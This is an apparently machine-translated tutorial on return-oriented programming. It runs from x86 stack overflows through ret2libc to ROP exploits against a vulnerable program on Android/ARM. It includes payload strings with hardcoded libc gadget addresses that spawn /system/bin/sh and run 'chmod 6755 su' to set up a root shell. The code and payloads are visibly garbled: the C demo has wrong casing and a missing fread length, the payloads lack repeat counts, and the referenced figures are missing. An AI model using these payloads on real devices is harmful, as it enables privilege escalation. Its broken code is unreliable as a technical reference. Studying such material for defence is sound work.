Introduction
ROP (return-oriented programming), or "return-oriented programming technology". The core idea is to find a suitable instruction fragment (gadget) in the existing function in the whole process space, and to splice each gadget through a well-designed return stack to achieve the purpose of malicious attack. The difficulty with constructing ROP attacks is that we need to search the entire process space for the gadgets we need, which can take a considerable amount of time. But once the "search" and "stitching" are completed, such an attack is irresistible, because it is used in the memory of the legitimate code, the normal antivirus engine for the ROP attack is impossible.
Stack overflow vulnerability and stack overflow attack
Before introducing the principle of ROP technology, we need to introduce the stack Overflow vulnerability first.
Stack Overflow (stack-based buffer overflows) is a common vulnerability in the security community. On the one hand, because of the programmer's negligence, strcpy, sprintf and other unsafe functions are used, which increases the possibility of stack overflow vulnerability. On the other hand, because information such as the return address of the function is stored on the stack, if the attacker can overwrite the data on the stack, it usually means that he can modify the execution process of the program, resulting in greater damage. This attack method is a stack overflow attack (stack smashing attacks).
The reason for the stack overflow attack is that there is a lack of error detection in the program, and the potential operation of the buffer (such as copying the string) is from low memory to high address, and the return address of the function call is always above the buffer (the current stack), which provides a condition for us to overwrite the return address. Here is the stack smashing attacks
Here is a demo with a stack overflow:
#include <stdio.h>
#include <string.h>
int BOF (FILE *badfile) {
Char buffer[20];
Fread (buffer, sizeof (char), badfile);
return 1;
}
int main () {
FILE *badfile;
Badfile = fopen ("Badfile", "R");
BOF (Badfile);
printf ("returned properly\n");
Fclose (Badfile);
return 0;
}
The logic of the demo is simply to read the longest 100 bytes of data from the Badfile file, but the buffer is only 20 bytes long, so it is possible to find the stack overflow.
Here is the compilation code compiled in the context of Cygwin (I have removed some details that are irrelevant to the logical understanding):
_main:
PUSHL%EBP
MOVL%esp,%EBP
Andl $-16,%esp
Subl $32,%esp
Call ___main
MOVL $LC 0, 4 (%ESP)
MOVL $LC 1, (%ESP)
Call _fopen
Movl%eax, (%ESP)
MOVL (%ESP),%eax
Movl%eax, (%ESP)
Call _bof
MOVL $LC 2, (%ESP)
Call _puts
MOVL (%ESP),%eax
Movl%eax, (%ESP)
Call _fclose
MOVL,%eax
Leave
Ret
_BOF:
PUSHL%EBP
MOVL%esp,%EBP
Subl $56,%esp
MOVL 8 (%EBP),%eax
Movl%eax, (%ESP)
MOVL $8 (%ESP)
MOVL $4 (%ESP)
Leal-28 (%EBP),%eax
Movl%eax, (%ESP)
Call _FRead
MOVL $,%eax
Leave
Ret
We only focus on the process of returning to main when the BOF is moved from main and after the BOF has finished executing.
- At call __fopen Start, the Badfile address is already in the stack before entering __bof.
- The function of the call _BOF statement is to put the next instruction (MOVL $LC 2, (%ESP)) into the stack, that is, the return address after the completion of the _BOF execution.
- After entering the _BOF, the first time to put the EBP into the stack, EBP is the current stack, for the recovery of esp.
The memory layout of the entire stack is as follows:
from the map you can see that the actual length of the system allocated to buffer is 28 bytes, followed by the old stack-bottom address, BOF return address and badfile address. Therefore, when the content length of the badfile is less than 28 bytes, the program can still run normally. However, when the content of the Badfile exceeds 28 bytes, the old EBP and RET address are overwritten directly, which is the purpose of modifying the return address.
Previous life of ROP
Before you have a perceptual understanding of stack smashing attacks, let's look at the evolution of ROP technology.
stack smashing attacks
This attack is the first way to stack overflow attacks, A detailed analysis has been done in the front.
Stack smashing attacks is not invincible, and its adversarial technology is DEP (Data execution Prevention) and The ASLR (Address Space Layout radomization) , under the protection of these two technologies, smashing attacks to some extent.
return-to-library technique
abbreviated as "Ret2lib", This technique bypasses the protection of DEP, and the core idea is to direct the return address directly to an existing function of the system (typically system, because it is simple to use, with only one parameter), which can also be used for attack purposes. Take another look at the example above, if you construct some data in badfile to be read by the BOF function, the following stack distribution is reached:
So when the program executes the BOF, jump to the system function immediately, and then go to get its first function, that is, & "/bin/sh", so that the program directly ran a SH process. Imagine that if this program is a suid program, it means that we are able to gain root privileges easily.
Borrowed Code Chunks
"Ret2lib" has been working very well, the emergence of direct x64 system. x64 compared to x86, the final difference is that the transfer of function parameters is no longer completely dependent on the stack, the first parameter of the function must be saved to the first register, which is eax, which leads to the simple placing of the parameter address on the stack does not work well unless the function itself does not require parameters. So, in this case, borrowed Code chunks technology was born. This technique is a thought breakthrough in ret2lib technology, which no longer simply points the return address to the entire function entry, but also includes any fragment of the instruction in the function. Or back to just the demo, if you want to implement the & "/bin/sh" address assigned to EAX, then we can try to find the following instructions:
POP%EAX
Ret
Or
POP%EAX
POP%EBX
JMP%EBX
Wait a minute
If we find the former instruction, we write the following data in Badfile: [Pop_address][&/bin/sh][system_address][fake_ebp][fake_retaddress], The same can be achieved by attacking the target.
Retrun-oriented-programming
Borrowed code chunk ultimately needs to rely on existing link library functions, if the link library itself does not provide the appropriate function, borrowed Code chunk do nothing, then ROP technology came into being. The guiding ideology of ROP is to hope that all malicious attacks are concatenated through the sequences of instructions in existing functions. This piece of instruction is a logical fragment that can be connected to each other by means of a jump instruction (x86 on the RET and jmp on ARM, which is the relevant instruction of the PC), called Gadget. The ultimate manifestation of ROP attacks is a string of gadgets.
The power of ROP is that any logic can be realized by finding an overflow defect, and the stack space is large enough, and ROP attacks are always a challenge for the major virus scanning engines.
Feasibility of ROP on arm
Since x86 (x64) differs from ARM's PCs specification, and the instruction format is inconsistent, the idea of ROP can also be used as an instruction comparison for both arm platforms:
Register function is also different
R15, or PC, is a program counter, relative to the EIP on x86
R14 is the LR, connection register, relative to the x86 there is no corresponding
R13 is SP, stack register, relative to ESP on x86
R11 (R7) is FP, bottom register, relative to EBP on x86
R4–r10, R12, used as a local variable
R0–R3, save the first three parameters of the parameter, if there are four parameters, then put the stack, this is the biggest difference with x86
R0 The return value of the Save function, consistent with the x86 saved in EAX
The PC in arm can be modified directly, which facilitates the ROP attack to a certain extent
Implement ROP attacks on Android
Most Android phones on the market are based on the arm platform, so it's theoretically possible to implement ROP attacks on Android, but it's also important to note that libc on Android is Bionic libc, not universally used glibc, Google has improved its security by optimizing the majority of r0-related instructions, which greatly increases the difficulty of ROP attacks.
Attack Demo
There's a whole bunch of theories ahead, so let's start with some demos.
The following tools are used:
Arm-linux-androideabi (cross compiler on Android)
IDA 6.1 (for remote debugging Android)
Python environment (for build shellcode)
ADDP (for quick lookup of system function addresses)
ADDSP (used to quickly verify that the string address in the libc.so is correct)
DEMO1, change the BOF return address
Let's start with a simple demo, or the previously mentioned bug demo, let's take a look at the code under arm
Where 0X83C4 is the command to execute after the BOF call, but 0X83CE is the address of our jump. Here is the code for the BOF
Through the code, we can get the memory distribution map of its stack, and send the following:
As can be seen from the figure, the system to buffer the length of the analysis is good 20 bytes, we first recorded the current old R7 value, on my phone for 0xbefffa70, and we need to modify the value of LR, to change to 0X000083CE. So we construct the following shellcode:
' A ' * + ' \x70\xfa\xff\xbe ' + ' \xcf\x83\x00\x00 ' (Ps:arm is using le storage)
It is also important to note that due to the presence of arm (32-bit) and thumb (16-bit) instruction format on ARM, the system is based on the target address of the bit[0], if bit[0] is 1, then automatically to the thumb mode execution, otherwise it will be executed arm. Our demo is compiled by thumb, so the address of the final jump should be 0x000083cf.
DEMO2, executing system ("/system/bin/sh")
Another difficulty is a little higher. To achieve this demo, we need to find the base address of libc.so, on my mobile phone, libc.so base address is 0x40025000, with the base address, we calculate the following address:
Ststem:0x0001a7e8 + 0x40025000 = 0x4003f7e8
/system/bin/sh:0x0003aa7f + 0x40025000 = 0x4005fa7f
In addition, we need to find the appropriate gadget to complete the assignment of the r0, and finally I found the Mallinfo function fragment, can meet this requirement, see Mallinfo instructions:
See 0X16F72 and 0x16f70 Two instructions, we can first jump to 0x16f72, the "/system/bin/sh" address assigned to R4, then control the PC, jump to 0x16f70, so that the "/system/bin/sh" Assigned to R0. Then point the PC to system.
List the addresses we are interested in:
baseaddr:0x40025000
mallinfo:0x00016f68 + 0x40025000 = 0x4003bf68
Ststem:0x0001a7e8 + 0x40025000 = 0x4003f7e8
&/system/bin/sh:0x0003aa7f + 0x40025000 = 0x4005fa7f
MOVS R0, r4:0x00016f70 + 0x40025000 = 0x4003bf70
POP {R4, PC}: 0x00016f72 + 0x40025000 = 0x4003bf72
Finally we construct the Shellcode as follows:
' A ' * + ' \x73\xbf\x03\x40 ' + ' \x7f\xfa\x05\x40 ' + ' \x71\xbf\x03\x40 ' + ' a ' * 4 + ' \xe9\xf7\x03\x40 '
DEMO3, execute arbitrary script
DEMO2 can only perform "/system/bin/sh", but often this cannot be exploited because we are unable to communicate with the target process, and we often prefer to have the root target process run directly to the power script. So in this demo, we implement arbitrary scripts.
We use "chmod 6755 su" as the test
The first thing to think about is that you want to write the script into buffer and then, on DEMO2 basis, point the value of R0 to the address of buffer. However, this is not practical, because the system function itself also needs to apply for stack space, as shown in the following code:
The system itself is required to request 32 bytes of stack space, and if used in a DEMO2 way, the script written to buffer may be overwritten as follows:
This causes the buffer to eventually have only 7-byte-length scripts, which is obviously very bad. So we need to find another way to increase the SP to the hight, looking for an instruction similar to the following:
Add SP, SP, #N
Pop {R7, PC}
This instruction can be said to be everywhere, see the BOF final instructions:
We first point the PC to the Add SP, SP, #0x20, you can let the SP move forward 32 bytes, just can offset the system of 32 bytes, as follows:
Take a look at the addresses we are concerned about:
baseaddr:0x40025000
R0:0xbefffa54
ADD sp, SP, #0x20:0x0000839a
POP {R7, PC}: 0x0000839c
Finally, we construct the following shellcode:
' chmod 6755 su ' + ' \x00 ' * + ' \x9b\x83\x00\x00 ' + ' a ' * + + ' a ' * 4 + ' \x73\xbf\x03\x40 ' + ' \x54\xfa\xff\xbe ' + ' \x71\ xbf\x03\x40 ' + ' A ' * 4 + ' \xe9\xf7\x03\x40 '
To better explain the entire logical jump, attach the gadgets chain below:
At last
- Through the above several demos, you should be able to feel the power of ROP
- The future of Android virus development trend, inevitably more and more advanced, more and more inclined to the bottom
- Fighting ROP attacks has always been a problem for the security community, and there are a number of issues related to how to combat ROP.
- Minimize the use of strcpy, GET, etc. no length check function
All the code involved in the sharing and the tools you use can be obtained from me.
Related references
- "RETURN-TO-LIBC Attack Lab"--wenliang Du, Syracuse University
- "Arm embedded system architecture and programming"--tie Qiu
- "Buffer Overflow"--Cheng
- "Exploitation on ARM"--stri/advance technology lab/security
- "ARM exploitation Ropmap"--long Le
"Turn" profiling of ROP attacks on Android